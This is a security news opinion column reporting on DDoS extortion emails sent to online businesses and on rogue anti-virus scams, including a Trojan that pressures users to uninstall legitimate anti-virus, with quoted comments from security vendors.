Attack vectors evolve as extortion and rogue anti-virus threats become more challenging

Opinion by Dan Raywood

In recent weeks I have received a lot of announcements and details on how attack vectors are evolving.

In recent weeks I have received a lot of announcements and details on how attack vectors are evolving.

Perhaps this is a coincidence in timing, but since we highlighted how rogue anti-virus was being sold by cold-callers, new methods have also been reported. A media report claimed that online businesses have been facing threats from a criminal gang employing scare tactics to trick them into handing over large sums of money to avoid having their sites hit by distributed denial-of-service (DDoS) attacks.

Essentially using bullying and extortion tactics, the report by ZDNet claimed that after a message is received, the fraudsters begin by charging businesses $200 and warn them that they will add another zero to the cost for every 48 hours that they do not receive the money, simultaneously attacking the website with a DDoS attack.

Symantec, who identified the tactic, said that attempts of gathering personal information or money by using tactics similar to those mentioned here are very common in scam attacks.

It said: “In this targeted attack, the ‘To' header is an email address provided in the registrant contact details for the domain, and the ‘Subject' header follows a format similar to ‘Hosting - Important Updates and Information', which helps the email to appear as if it has been sent by the hosting service provider.”

Commenting, VeriSign CTO Ken Silva said that the problem in this instance is that enterprises have no way of verifying whether the criminals will actually carry out their threat of taking down their sites.

He said: “However, with a DDoS attack able to cost businesses millions of pounds in lost revenue, ignoring such a threat is a risk businesses cannot afford to take. DDoS attacks are increasing in frequency, scale and sophistication, as have the tactics employed by cyber criminals.

“A report by Forrester found that just under 75 per cent of respondents had been a victim of one or more DDoS attacks within the past year. We often see companies trying to protect themselves by employing outdated practices such as bandwidth over provisioning which are costly and ineffective. The fact remains that prevention is always better than cure.”

Another ‘trend' is regarding hackers forcing a ‘legitimate' anti-virus uninstall, where hackers leverage a clone of the prevalent rogue CoreGuard anti-virus product called AnVi.

Detected again by Symantec, the AnVi gake product gets the user to access the legitimate anti-virus uninstaller and upon executing the malicious file, the Trojan shows a message box asking the user to uninstall the legitimate anti-virus program, if it is present on the computer.

It said: “In this case it is using the legitimate anti-virus uninstaller and forces the user to remove the anti-virus software from the computer. Moreover, it tries to download rogue anti-virus software by connecting to malicious websites. In this case it tries to download AnVi Antivirus, which is a clone of the CoreGuard Antivirus 2009 misleading application.”

Rob Horton at NCC Group said: “These forms of social engineering attacks are becoming more common. Keeping your system and anti-virus software fully up-to-date can help mitigate the threats presented by some of these attacks.

“However, the key to adequate protection lies in browsing caution, paying close attention to any warnings displayed by your operating system or browser, and being very careful what you click on.”

The threat of rogue anti-virus, it seems will never go away. Sophos warned of a new threat recently that spread via ‘suspicious email attachments from unknown sources'. It said that if recipients open HTML files attached to the spam emails, their web browser will be directed to a hacked website containing a malicious iFrame that allows the fake anti-virus attack to be launched.

Sophos detects the malicious email attachments as Troj/JSRedir-CH and the fake anti-virus attack as Mal/FakeAV-EI. The emails use a variety of themes ranging from credit card charges to free-to-view holiday photographs to lure recipients in.

Graham Cluley, senior technology consultant at Sophos, said: “A scam like this can be extremely successful at passing revenue directly and quickly into the hands of hackers - so we all have to be on our guard. The attacks are designed to trick people into paying to remove threats from their computer that never really existed in the first place.

“Once a user's computer is infected with fake anti-virus, the software will continue to bombard the user with bogus warning messages to encourage them to pay for threats to be removed or install more malicious code onto their PC.  If computer users are concerned about the security of their machine, they should go directly to a legitimate IT security site, rather than put their trust in a criminal hacking gang.”

These threats are likely to be a few among many, and I dare say that there are stronger and more successful opportunities being peddled right now. When it comes to user security, a reputable brand is the way forward.

However if you are being threatened with attack, the decision on how to act on what could be an empty threat lies with the recipient.


Find this article useful?

Get more great articles like this in your inbox every lunchtime

Upcoming Events